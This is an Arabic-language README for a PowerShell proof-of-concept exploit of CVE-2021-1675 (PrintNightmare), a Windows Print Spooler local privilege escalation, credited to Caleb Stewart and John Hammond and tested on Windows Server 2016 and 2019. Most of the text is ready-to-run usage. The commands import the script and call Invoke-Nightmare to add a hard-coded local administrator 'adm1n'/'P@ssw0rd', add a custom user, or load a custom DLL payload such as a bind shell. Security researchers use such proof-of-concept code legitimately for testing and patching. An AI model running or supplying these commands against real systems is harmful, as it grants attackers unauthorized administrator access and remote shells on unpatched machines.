
تنفيذ نقي باستخدام PowerShell لـ CVE-2021-1675 Print Spooler Local Privilege Escalation (PrintNightmare)
كاليب ستيوارت | جون هاموند | 1 يوليو 2021
CVE-2021-1675 هي ثغرة حرجة لتنفيذ الأوامر عن بعد وتصعيد الامتيازات المحلية تُعرف باسم "PrintNightmare".
تم إصدار استغلالات إثبات المفهوم (Python, C++) لقدرة تنفيذ الأوامر عن بعد، ونسخة بلغة C# لتصعيد الامتيازات المحلية. لم نرَ تطبيقًا أصليًا في PowerShell الخالص، وأردنا تجربة تحسين وإعادة صياغة الاستغلال.
يقوم هذا السكريبت PowerShell بتنفيذ تصعيد الامتيازات المحلية (LPE) باستخدام تقنية هجوم PrintNightmare.

تم اختبار هذا على Windows Server 2016 و Windows Server 2019.
إضافة مستخدم جديد إلى مجموعة المسؤولين المحليين افتراضياً:
Import-Module .\cve-2021-1675.ps1
Invoke-Nightmare # add user `adm1n`/`P@ssw0rd` in the local admin group by default
Invoke-Nightmare -DriverName "Xerox" -NewUser "john" -NewPassword "SuperSecure"
قدم حمولة DLL مخصصة، لفعل أي شيء آخر قد ترغب به.
Import-Module .\cve-2021-1675.ps1
Invoke-Nightmare -DLL "C:\absolute\path\to\your\bindshell.dll"